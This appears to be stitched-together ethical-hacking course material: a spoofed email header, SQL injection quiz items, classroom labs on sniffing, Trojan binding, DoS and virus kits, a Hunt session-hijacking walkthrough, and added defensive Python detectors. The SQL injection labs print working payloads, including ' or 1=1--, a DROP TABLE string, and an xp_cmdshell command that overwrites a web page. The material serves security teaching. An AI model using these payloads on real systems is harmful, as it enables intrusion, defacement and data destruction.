Received: from smtp.com (fw.emumail.com [215.52.220.122]) by raq-221-181.ev1.net (8.10.2/8.10.2) with ESMTP id h78NIn404807 for <mikeg@thesolutionfirm.com>; Sat, 9 Aug 2003 18:18:50 -0500
Received: (qmail 12685 invoked from network); 8 Aug 2003 23:25:25 -0000
Received: from ([19.25.19.10]) by smtp.com with SMTP
Received: from unknown (HELO CHRISLAPTOP) (168.150.84.123) by localhost with SMTP; 8 Aug 2003 23:25:01 -0000
From: "Bill Gates" <bgates@microsoft.com>
To: "mikeg" <mikeg@thesolutionfirm.com>
Subject: We need your help!
Date: Fri, 8 Aug 2003 19:12:28 -0400
Message-ID: <51.32.123.21@CHRISLAPTOP>
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="----=_NextPart_000_0052_01C35DE1.03202950"
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook, Build 10.0.2627
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1165
Importance: Normal
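The following Python example is added here and is not from the original supplement. It does the analysis the headers above invite: walk the Received chain from the bottom (the earliest hop) to find where the message really entered the mail system, then compare that hop and the Message-ID domain with the domain the From line claims. The header block is the one shown above, re-entered as a string with the line structure restored; nothing about the hosts or addresses is added.

```python
import email
import re
from email.utils import parseaddr

# The header block from the sample above, as a parseable message (body is constructed).
RAW_MESSAGE = """Return-Path: <bgates@microsoft.com>
Received: from smtp.com (fw.emumail.com [215.52.220.122]) by raq-221-181.ev1.net (8.10.2/8.10.2) with ESMTP id h78NIn404807 for <mikeg@thesolutionfirm.com>; Sat, 9 Aug 2003 18:18:50 -0500
Received: (qmail 12685 invoked from network); 8 Aug 2003 23:25:25 -0000
Received: from ([19.25.19.10]) by smtp.com with SMTP
Received: from unknown (HELO CHRISLAPTOP) (168.150.84.123) by localhost with SMTP; 8 Aug 2003 23:25:01 -0000
From: "Bill Gates" <bgates@microsoft.com>
To: "mikeg" <mikeg@thesolutionfirm.com>
Subject: We need your help!
Date: Fri, 8 Aug 2003 19:12:28 -0400
Message-ID: <51.32.123.21@CHRISLAPTOP>

(body omitted)
"""

IPV4 = re.compile(r"\b(\d{1,3}(?:\.\d{1,3}){3})\b")
HELO = re.compile(r"\(HELO\s+([^)\s]+)\)")


def received_chain(raw):
    """Received headers in delivery order: the last one in the header block is the earliest hop."""
    msg = email.message_from_string(raw)
    return list(reversed(msg.get_all("Received", [])))


def trace_origin(raw):
    """(HELO name, IP) from the earliest Received line, i.e. the host that first submitted the mail."""
    earliest = received_chain(raw)[0]
    helo = HELO.search(earliest)
    ip = IPV4.search(earliest)
    return (helo.group(1) if helo else None, ip.group(1) if ip else None)


def spoof_indicators(raw):
    """Mismatches between the claimed sender domain and the evidence in the transport headers."""
    msg = email.message_from_string(raw)
    from_domain = parseaddr(msg["From"])[1].rsplit("@", 1)[-1].lower()
    findings = []
    msgid_domain = msg["Message-ID"].strip("<> ").rsplit("@", 1)[-1].lower()
    if not msgid_domain.endswith(from_domain):
        findings.append(f"Message-ID domain '{msgid_domain}' does not match From domain '{from_domain}'")
    helo, ip = trace_origin(raw)
    if helo and not helo.lower().endswith(from_domain):
        findings.append(f"first hop HELO '{helo}' ({ip}) is not a {from_domain} host")
    return findings


if __name__ == "__main__":
    for i, hop in enumerate(received_chain(RAW_MESSAGE)):
        print(f"hop {i}: {hop}")
    print("origin:", trace_origin(RAW_MESSAGE))
    for f in spoof_indicators(RAW_MESSAGE):
        print("indicator:", f)
```

The From header is whatever the sender typed; the earliest Received line was written by the receiving relay, which is why that is the line to trust when deciding whether the mail is spoofed.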
Attack #13
The following code is vulnerable to what type of attack?
<%
Set objConn = CreateObject("ADODB.Connection")
objConn.Open Application("WebUsersConnection")
sSQL="SELECT * FROM Users where Username='" & Request("user") & _
     "' and Password='" & Request("pwd") & "'"
Set RS = objConn.Execute(sSQL)
If RS.EOF then
    Response.Redirect("login.asp?msg=Invalid Login")
Else
    Session.Authorized = True
    Set RS = nothing
    Set objConn = nothing
    Response.Redirect("mainpage.asp")
End If
%>
Attack #15
Below is a sample output of a web log. What type of attack is being performed here?
Attempted login of unknown user: johnm
Attempted login of unknown user: susaR
Attempted login of unknown user: sencat
Attempted login of unknown user: pete'';
Attempted login of unknown user: ' or 1=1--
Attempted login of unknown user: '; drop table logins--
Login of user jason, sessionID= 0x75627578626F6F6B
Login of user daniel, sessionID= 0x98627579539E13BE
Login of user rebecca, sessionID= 0x9062757944CCB811
Login of user mike, sessionID= 0x9062757935FB5C64
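The following Python example is added here and is not from the original supplement. It runs over log lines in the format of the sample above and separates ordinary unknown-user failures from attempts whose "username" contains SQL syntax, which is how the attack in this question would be spotted in a log review or a SIEM rule. The log text is constructed from the sample; the pattern set is a starting point, not a complete list.

```python
import re

# Constructed log, modelled on the sample web log above.
LOG = """Attempted login of unknown user: johnm
Attempted login of unknown user: susaR
Attempted login of unknown user: sencat
Attempted login of unknown user: pete'';
Attempted login of unknown user: ' or 1=1--
Attempted login of unknown user: '; drop table logins--
Login of user jason, sessionID= 0x75627578626F6F6B
Login of user daniel, sessionID= 0x98627579539E13BE"""

UNKNOWN_USER = re.compile(r"Attempted login of unknown user: (.*)$")
# Quote, comment marker, statement separator, a tautology like "or 1=1", or a SQL verb.
SUSPICIOUS = re.compile(
    r"'|--|;|\b(?:or|and)\b\s+\d+\s*=\s*\d+|\b(?:drop|union|select|insert|update|delete)\b",
    re.IGNORECASE)


def classify_line(line):
    """'sqli-probe', 'unknown-user', or None for lines that are not failed logins."""
    m = UNKNOWN_USER.search(line)
    if not m:
        return None
    username = m.group(1).strip()
    return "sqli-probe" if SUSPICIOUS.search(username) else "unknown-user"


def injection_probes(log_text):
    """The submitted usernames that look like SQL injection attempts, in log order."""
    return [line.split(": ", 1)[1] for line in log_text.splitlines()
            if classify_line(line) == "sqli-probe"]


def summarize(log_text):
    """Counts per category, the figure an alert threshold would be applied to."""
    counts = {}
    for line in log_text.splitlines():
        category = classify_line(line)
        if category:
            counts[category] = counts.get(category, 0) + 1
    return counts


if __name__ == "__main__":
    for line in LOG.splitlines():
        print(f"{classify_line(line) or 'ok':12} {line}")
    print(summarize(LOG))
```

Three probes from one client in a short window, each escalating from a bare quote to a tautology to a DROP statement, is the sequence worth alerting on; a single unknown user is just a typo.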
Footprinting
Footprint the http://www.certifiedhacker.com web site. Suggested tools:
    www.dnsstuff.com
    Sam Spade
    Smart Whois
    www.archive.org
    www.kloth.net
    IP2Country
    NewTracePro
    Visual Route
    www.centralops.net
    Which ISP Owns IP
    WhereIsIP
Scanning
1) Nmap. Launch a packet sniffer (Ettercap, Ethereal/Wireshark, etc.) and run various Nmap scans against other hosts in the classroom. Watch for RSTs, SYN/ACKs, etc. coming from the host you are scanning.
2) Hping. Read through the Hping2 man page (available online or in Linux). Perform a port scan on a computer in the classroom. Experiment with different options in Hping2 to try different types of scans.
Bonus: Read the Hping3 man page. Use Hping3 to scan a computer in the web site. Do you prefer Hping3 or Hping2? Why?
Enumeration
Ask another student or your instructor to set up additional accounts and some shares on their computer.
What is the password of the Administrator? (Hint: NAT or Venom can help you with this)
How do you protect against NULL sessions? (Hint: It can be done in the registry or in the local security policies).
System Hacking
Password Cracking
Create three additional users on your computer. Assign one user a short dictionary password of less than eight characters. Give a blank password to another. Assign a difficult password to the third.
Are you able to get the passwords of the other accounts?
Steganography
Hide the message "you've been hacked" on your computer. Suggested tools:
    NTFS Alternate Data Streams
    Snow
    NT Rootkit
    Blindside
Read the Netcat man page. What other things can you do with Netcat?
Can you think of any ways you might get the Trojan on the victim host?
Detect the ports and processes running on your computer. Suggested tools:
    Fport
    TCP View
    What's on my computer?
    Hacker Eliminator
    Process Viewer
    Windows task manager
    Netstat
Did you find any Trojans running on your computer? If so, what ports are they listening on?
Trojan Wrappers
Using Yet Another Binder (YAB), bind a Trojan with a Windows program (such as Solitaire or Calculator).
Sniffers
1) Sniff web traffic on the network. Suggested tools: Ettercap (Linux) Windump/tcpdump
2) MSN chat. Work with a partner to set up MSN Messenger on your computers. Launch a sniffer and chat with each other. Can you see each other's conversation? Download the MSN IM encryption software Simplite (www.secway.fr) and re-launch MSN IM. Can you see each other's conversation?
3) E-mail. Set up a free e-mail account on mail.com. Configure Outlook Express for your new POP account. Run the sniffer in the background while you send test messages. Can you see your password and/or your e-mail messages?
4) ARP poisoning / MAC flooding. Test out ARP poisoning and/or MAC flooding to capture all traffic. Suggested tools: Ettercap (Linux), Macof (Linux), Cain & Abel. Can you see traffic from other hosts?
Denial Of Service
As a class, agree on a denial of service tool and launch it against a single computer in the classroom. Suggested tools: DDOSPing, Blast20, Nemesy13, Datapool. If possible, launch multiple processes of these tools. On the victim host, launch task manager and/or performance monitor to see if you are making an impact.
In a previous article, I discussed ARP poisoning and password detection tools. This takes that article to the next level and discusses how to hijack sessions. Sniffing networks (or ARP poisoning to sniff switched networks) is a great way to collect passwords. Unfortunately, tools like Dsniff and ettercap aren't always capable of detecting every password that crosses the network. This is where session hijacking can become your friend (or your worst enemy, depending on which side of the infosec coin you're on). In this article I will detail Netflood's test results and the techniques we used to hijack active sessions.
Abstract: In order to hijack traffic, multiple attacks or techniques may have to take place. For example, one may have to DoS attack a server in order to keep it from sending RST (reset) packets to the victim. If I were to detail a DoS technique (with every available argument) it would distract thoughts away from the real topic of this article. Some knowledge will have to be gleaned from RFCs, man pages, code comments, by researching on your own, or by merely using your intelligence to conceive of vulnerabilities not discussed herein; hence the word "primer". No one wrote me a little "session hijacking for dummies" book and I figured it out, so you can too.
Disclaimer: This paper describes nothing more than some vulnerabilities of the Transmission Control Protocol and tools/thoughts which exploit those vulnerabilities. It is intended for educational use only. You are responsible for what you do with this information. I am no more responsible for people committing crimes with this information than chemistry instructors are responsible for people who construct bombs or chemical warfare devices. [Insert expensive lawyer jargon here to stave off unfounded FBI allegations ala Sil]. All your base are belong to us.
Contents: A look at TCP
A Look At TCP
Transmission Control Protocol (TCP) is addressed in RFC 793. For the sake of brevity, I will only cover relevant portions of the RFC, adding information to it when necessary.
The Transmission Control Protocol (TCP) is intended for use as a highly reliable host-to-host protocol between hosts in packet-switched computer communication networks, and in interconnected systems of such networks. TCP must recover from data that is damaged, lost, duplicated, or delivered out of order by the internet communication system. This is achieved by assigning a sequence number to each octet transmitted, and requiring a positive acknowledgment (ACK) from the receiving TCP. If the ACK is not received within a timeout interval, the data is retransmitted. At the receiver, the sequence numbers are used to correctly order segments that may be received out of order and to eliminate duplicates. Damage is handled by adding a checksum to each segment transmitted, checking it at the receiver, and discarding damaged segments.
A fundamental notion in the design is that every octet of data sent over a TCP connection has a sequence number. Since every octet is sequenced, each of them can be acknowledged. The acknowledgment mechanism employed is cumulative so that an acknowledgment of sequence number X indicates that all octets up to but not including X have been received. This mechanism allows for straight-forward duplicate detection in the presence of retransmission. Numbering of octets within a
It is essential to remember that the actual sequence number space is finite, though very large. This space ranges from 0 to 4294967295 (2**32 - 1). Since the space is finite, all arithmetic dealing with sequence numbers must be performed modulo 2**32 (4294967296). This unsigned arithmetic preserves the relationship of sequence numbers as they cycle from 2**32 - 1 to 0 again. There are some subtleties to computer modulo arithmetic, so great care should be taken in programming the comparison of such values.
So you see that the ISN can be any number between 0 and 4294967295. You also hopefully noticed that every octet has a sequence number, not every session. The server (TCPB) will respond to the client (TCPA) with its own sequence number, while acknowledging the client's sequence number. See below for an example:
Sequence prediction to take over networks was first written about in 1985 (or thereabouts) by none other than Robert T. Morris (his son created the first Internet worm). The first attack employing this technique did not occur until Christmas of '94; this is known as the Mitnick hack of Shimomura (or "Christmas hack"). Over the years, OSs have become more random in deriving the ISN, but we all know that computers are not random thinkers. Eventually, over time, even computers choosing random numbers will repeat themselves, because the randomness is based on an internal algorithm. There is a great in-depth article, which can be found here, that explores sequence number generation and prediction in more detail.
Once a sequence number has been agreed to, all following data will be the ISN+1. This makes injecting data into the communication stream possible, if one were so inclined. The tricky part is not hijacking the session, but finding out the ISN. Once the ISN (or the ISN increment) is discovered, everything else is gravy. Three requirements to hijack non-encrypted TCP communications:
1. There must be non-encrypted session oriented traffic.
If the attacker is on your local segment, they can sniff the connections and therefore see what the ISN+1 number is; they can also have the traffic routed back to them by poisoning the ARP cache. This is why implementing internal network protocol encryption is so important (albeit rarely done).
Local Network Session Hijacking
Rather than reinvent the wheel, we used a tool that's readily available, called Hunt (downloadable @ netflood.net). We will use the newest version (1.5) because it runs on WindowsME (that's just a joke to get the kiddies' hopes up); you'll actually need Linux or some other *nix variant (though you may have to port Hunt to work with your specific OS). In my case, I have a test machine running Redhat 7.1 and it works fine. You shouldn't have a problem using Hunt with any Linux 2.X kernel.
1. Start hunt.
2. Select the "u" option (host up tests). This will enable you to see TCP connections on your network (i.e. victims).
3. Enter the victim's IP address or your network address.
4. Enter the victim's IP address again or the broadcast address of your local network (this will ensure that our entire network can be victims of this attack).
5. Choose the default answers unless you know what you're doing. Hunt will now look for victims (based on the range) using a variety of techniques such as ARP broadcasting and pinging.
6. Choosing "yes" for the net ifc promisc test (arp method) option will enable Hunt to do a promiscuous interface test using an ARP broadcast.
7. Pick the default MAC address.
8. Hunt will now want to do a promiscuous test using ping; choose "yes" and the default MAC address for the remaining options.
At this point you will be returned to the main menu.
We can now watch the entire communication. So if the victim telnets to a server, we will see him authenticating and doing whatever he decides to do. If he telnets from that server to another server we can watch him log in and get any information we need. We could just sit and watch the communication all night but the problem is the victim is typing extremely slow, and that can be irritating for those of us who type fast. Since that's the case, we should now take over and type for him.
Press control-c when prompted to end the show you've just been watching. You will then be presented with the main screen. We are going to do an "arp/simple hijack", so we choose option "a".
We are again presented with a list of TCP sessions. I'll choose option "0" (or whatever communication I choose).
I'm going to spoof all addresses, so I'll use the "yes" defaults. Any old source MAC address will do, so I'll keep the defaults. I'll press enter and accept the raw input mode. Since I want to see everything I will dump all connections. Choose whether or not to print source and destination same characters, in my case I will choose "no". I now need to press control-c to input myself into the connection.
I have now hijacked the victim's session and I can do anything the user was allowed to do. You may be asking why you can choose any MAC address instead of yours. The answer is because we are cache poisoning the devices which will relay the traffic to us, whether it is a switch, a router, or every host on our network segment. This was covered in a previous netflood article here.
If you are wondering why we shouldn't "force the ARP spoof", keep reading. It's actually fundamental networking concepts. This option would only be valid if we were attempting to hijack a session that was taking place between two hosts on our network segment.
Remote Network Session Hijacking: This is far more difficult to do today than it was in yesteryear, but it is not impossible. As this is only a "primer", I'm not going to go into exact details for determining an ISN (you can go here for more), but I will give you the fundamental knowledge necessary to help you with the next steps.
Remote Network Session Hijacking (RNSH) leaves the attacker blind. This is why RNSH is also referred to as "blind spoofing". The reason is because we are exploiting trust relationships between client and server on a remote network. The trust relationship is established by the rhosts file created when using services such as rlogin, rsh, or rcp. We cannot spoof a trusted host (found in the rhosts file) on a different network and see the reply packets because they are never routed back to us. We cannot ARP cache poison machines on remote networks because routers do not route ARP broadcasts across the Internet (newbie note: ARP is a layer 2 function, routers work at layer 3). Since we cannot receive the reply traffic we must anticipate the responses from the victim and keep the host we are pretending to be (spoofing) from sending a RST to the victim.
RNSH takes advantage of trust relationships between computers and you are spoofing the trusted client. If the correct spoof rules are configured on edge routers or border gateways, you will have a tremendously hard time performing a RNSH.
The best way for you to see blind spoofing in action is to read Shimomura's breakdown of Mitnick's *cough* alleged *cough* attack.
Defending against session hijack attacks
1. Use encrypted protocols, like those found in the OpenSSH suite. The OpenSSH suite includes the ssh program, which replaces rlogin and telnet; scp, which replaces rcp; and sftp, which replaces ftp. Also included is sshd, the server side of the package, and the other basic utilities like ssh-add, ssh-agent, ssh-keygen and sftp-server.
2. Use strong authentication (like Kerberos) or peer-to-peer VPNs.
3. Configure the appropriate spoof rules on gateways (internal and external).
4. Monitor for ARP cache poisoning, using IDS products or ARPwatch.
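Point 4, monitoring for ARP cache poisoning, is the one defence on the list that catches the local hijack described above while it is happening. The following is an added example in the spirit of ARPwatch, not code from the course material: it walks a stream of ARP replies and raises the two alerts ARPwatch is known for, an IP whose MAC binding changes and one MAC announcing itself for several IPs. The replies it inspects are constructed sample records, and the alert dictionary layout is my own.

```python
from collections import defaultdict

# Constructed sample of ARP replies seen on one segment: (time, sender IP, sender MAC).
# The last two replies imitate what cache poisoning looks like on the wire: one MAC
# suddenly announces the gateway's IP and then a client's IP as well.
SAMPLE_ARP_REPLIES = [
    ("10:00:01", "192.168.1.1", "00:11:22:33:44:01"),
    ("10:00:02", "192.168.1.10", "00:11:22:33:44:10"),
    ("10:00:03", "192.168.1.1", "00:11:22:33:44:01"),
    ("10:00:04", "192.168.1.1", "DE:AD:BE:EF:00:01"),
    ("10:00:05", "192.168.1.10", "de:ad:be:ef:00:01"),
]


def detect_arp_anomalies(replies):
    """Walk ARP replies in order and return alerts, ARPwatch-style:
    'changed'  - an IP that was bound to one MAC is now announced by another
    'multi-ip' - one MAC has announced itself for more than one IP
    """
    ip_to_mac = {}                 # current IP -> MAC binding
    mac_to_ips = defaultdict(set)  # every IP each MAC has claimed so far
    alerts = []
    for ts, ip, mac in replies:
        mac = mac.lower()          # normalise case so DE:AD and de:ad compare equal
        prev = ip_to_mac.get(ip)
        if prev is not None and prev != mac:
            alerts.append({"time": ts, "kind": "changed", "ip": ip,
                           "old_mac": prev, "new_mac": mac})
        ip_to_mac[ip] = mac
        claimed = mac_to_ips[mac]
        if ip not in claimed:      # only alert when the MAC gains a new IP, not on repeats
            claimed.add(ip)
            if len(claimed) > 1:
                alerts.append({"time": ts, "kind": "multi-ip", "mac": mac,
                               "ips": sorted(claimed)})
    return alerts


if __name__ == "__main__":
    for alert in detect_arp_anomalies(SAMPLE_ARP_REPLIES):
        print(alert)
```

On the sample data the detector stays quiet through the first three replies and then reports the gateway binding change, the client binding change, and finally the single MAC holding both IPs. The same caveat applies here as with ARPwatch itself: a DHCP lease moving to another host, a replaced NIC, or a redundant gateway pair sharing a virtual MAC will also produce "changed" alerts, so the alerts need correlating with change records before anyone is paged.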
Buffer Overflow
1. Start Knoppix
Lab#2
Use the Metasploit command line and web interface to hack into another machine. Experiment with different options.
Linux Hacking
Open Linux and run TCPDump from the command line. Try out the following options. (You may want to generate some traffic from your machine in order to capture traffic.)
To list the available interfaces: tcpdump -D
To show all traffic on eth1: tcpdump -i eth1
To capture just TCP (filter keywords are lower-case): tcpdump tcp
To capture just UDP: tcpdump udp
To capture just one port: tcpdump port 23
To dump to a pcap file: tcpdump -i eth0 -w test.pcap
To read back the packet file: tcpdump -r test.pcap
To capture only src IP, dst IP and protocol, and suppress DNS lookups: tcpdump -i eth1 -nn -q
To read back the packet file but suppress DNS lookups: tcpdump -nnr test.pcap
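The -nn -q form reduces each packet to its addresses and protocol, which is exactly the shape you want when turning a capture into a per-flow summary. The following added example (mine, not from the course) parses lines in that layout and counts packets per source, destination and protocol, and it also flags destination ports of cleartext services such as the telnet port used above. The sample lines are constructed in the style of tcpdump -nn -q output; the field layout assumed is time, "IP", source[.port] > destination[.port]: protocol.

```python
import re
from collections import Counter

# Constructed sample lines in the style of "tcpdump -nn -q" output (no name
# resolution, quiet protocol detail). The last line checks that junk is skipped.
SAMPLE_CAPTURE = """\
12:00:00.000001 IP 192.168.1.10.51234 > 10.0.0.5.80: tcp 0
12:00:00.000245 IP 10.0.0.5.80 > 192.168.1.10.51234: tcp 0
12:00:01.100000 IP 192.168.1.10.40001 > 10.0.0.53.53: UDP, length 41
12:00:02.000000 IP 192.168.1.10 > 10.0.0.5: ICMP echo request, id 1, seq 1, length 64
12:00:03.000000 IP 192.168.1.10.51235 > 10.0.0.5.23: tcp 12
garbage line that should be skipped
"""

# Assumed layout: time, "IP", src[.port] > dst[.port]: proto ...   (ports absent for ICMP)
LINE_RE = re.compile(
    r"^(?P<time>\S+) IP "
    r"(?P<src>\d+\.\d+\.\d+\.\d+)(?:\.(?P<sport>\d+))? > "
    r"(?P<dst>\d+\.\d+\.\d+\.\d+)(?:\.(?P<dport>\d+))?: "
    r"(?P<proto>[A-Za-z]+)"
)


def parse_capture(text):
    """Return one dict per recognised packet line; unrecognised lines are dropped."""
    packets = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        packets.append({
            "time": m["time"], "src": m["src"], "dst": m["dst"],
            "sport": int(m["sport"]) if m["sport"] else None,
            "dport": int(m["dport"]) if m["dport"] else None,
            "proto": m["proto"].lower(),   # "UDP" and "tcp" both normalise to lower-case
        })
    return packets


def summarize_flows(packets):
    """Count packets per (src IP, dst IP, protocol), the three fields -nn -q keeps."""
    return Counter((p["src"], p["dst"], p["proto"]) for p in packets)


def cleartext_service_hits(packets, ports=(21, 23, 80)):
    """Destination ports from the cleartext set (ftp, telnet, http) present in the capture."""
    return sorted({p["dport"] for p in packets if p["dport"] in ports})


if __name__ == "__main__":
    pkts = parse_capture(SAMPLE_CAPTURE)
    for flow, count in summarize_flows(pkts).items():
        print(flow, count)
    print("cleartext services seen on ports:", cleartext_service_hits(pkts))
```

Feed it real output with `tcpdump -nnr test.pcap -q | python3 this_script.py` after swapping SAMPLE_CAPTURE for sys.stdin.read(); the regex is deliberately strict about the IPv4 layout, so IPv6 ("IP6") lines and ARP lines fall through as unrecognised rather than being mis-parsed.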
SQL Injection
Lab#1 1. Discover a list of databases: select * from master..sysdatabases
3. Using a database called Juggybank, get a list of information from the credit card table: select * from juggybank..Creditcard;
4. Using a database called Juggybank, get a list of information from the UserInfo table: select * from juggybank..userinfo;
5. Get a list of information from the UserInfo table where username='joker': select * from juggybank..userinfo where username='joker';
6. Get a list of information from the UserInfo table where username='joker' and password='joker': select * from juggybank..userinfo where username='joker' and password='joker';
7. Get a list of information from the UserInfo table where username='joker' and password='' (You should get no records back because the password for the joker user is not blank): select * from juggybank..userinfo where username='joker' and password='';
8. Get a list of information from the UserInfo table where username='joker' and password='' or return all rows if 1 is equal to 1: select * from juggybank..userinfo where username='joker' and password='' or 1=1--;
Lab#2 Perform SQL injection on your web site. Go to the Coastal Banc Online Banking Demo web site on your desktop.
Next, attempt to login with an invalid username and password. This should fail.
Next, enter the username of: ' OR 1=1 And enter any password you wish. This should return the first record.
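Step 8 of Lab#1 and the login bypass in Lab#2 both work for the same reason: the application pastes the form fields straight into the SQL text, so the quote and the OR 1=1 become part of the query's logic. The following added example (mine, not part of the course material) uses an in-memory SQLite stand-in for the juggybank..userinfo table to show the concatenated login query next to a parameterized one, which hands the very same input to the database as a value. The three user rows are constructed sample data, stored in cleartext only to mirror the lab's table.

```python
import sqlite3

# Constructed stand-in for the lab's juggybank..userinfo table (cleartext passwords
# only because the lab table has them; a real table would hold password hashes).
SAMPLE_USERS = [("joker", "joker"), ("alice", "s3cret"), ("bob", "hunter2")]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("create table userinfo (username text, password text)")
    conn.executemany("insert into userinfo values (?, ?)", SAMPLE_USERS)
    return conn


def login_vulnerable(conn, username, password):
    """The lab's pattern: the query text is built by concatenation, so user input
    that contains a quote changes the structure of the WHERE clause."""
    sql = ("select * from userinfo where username='" + username +
           "' and password='" + password + "'")
    return conn.execute(sql).fetchall()


def login_parameterized(conn, username, password):
    """Same query with bound parameters: the driver sends the input as data, so a
    quote or comment marker inside it is just characters to compare against."""
    sql = "select * from userinfo where username=? and password=?"
    return conn.execute(sql, (username, password)).fetchall()


def demo():
    """Row counts returned for a valid login and for the Lab#1 step-8 payload
    in the password field, against both query styles."""
    conn = make_db()
    payload = "' or 1=1--"   # the same idea as step 8: close the string, add OR 1=1, comment the rest
    return {
        "vuln_valid": len(login_vulnerable(conn, "joker", "joker")),
        "vuln_injected": len(login_vulnerable(conn, "joker", payload)),
        "param_valid": len(login_parameterized(conn, "joker", "joker")),
        "param_injected": len(login_parameterized(conn, "joker", payload)),
    }


if __name__ == "__main__":
    print(demo())
```

With the concatenated query the injected password turns the WHERE clause into `username='joker' and password='' or 1=1`, so every row in the table comes back (three here); with the bound parameters the database looks for a user whose password is literally `' or 1=1--` and finds nothing. Bound parameters are the fix that removes the whole class, independent of how carefully the input is escaped.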
Lab#3 Go to http://localhost/sql/client2.htm In the Login name field, type the following to create a file on the hard drive of the web server: ';exec master..xp_cmdshell "echo you've-been-hacked > c:\inetpub\wwwroot\default.asp" Do not enter anything for the password and press submit. Open http://localhost.
Lab#4 Using the same technique as SQL injection lab#2, get Netcat started on your victim host and gain access to the command prompt. Hint: xp_cmdshell and TFTP
Lab#5 Using SQL injection and the tools in the web hacking and web application hacking sections, attempt to hack into another computer's Coastal Bank web site. Objectives:
Wireless Hacking
1. If you have a laptop with wireless connectivity, download NetStumbler and use it to find wireless networks.
2. Using Ethereal/Wireshark, sniff the wireless traffic. Why do you see more traffic in a wireless network than in a wired switched network?
Viruses
Create your own virus using the Windows Scripting Host Worm Construction Kit.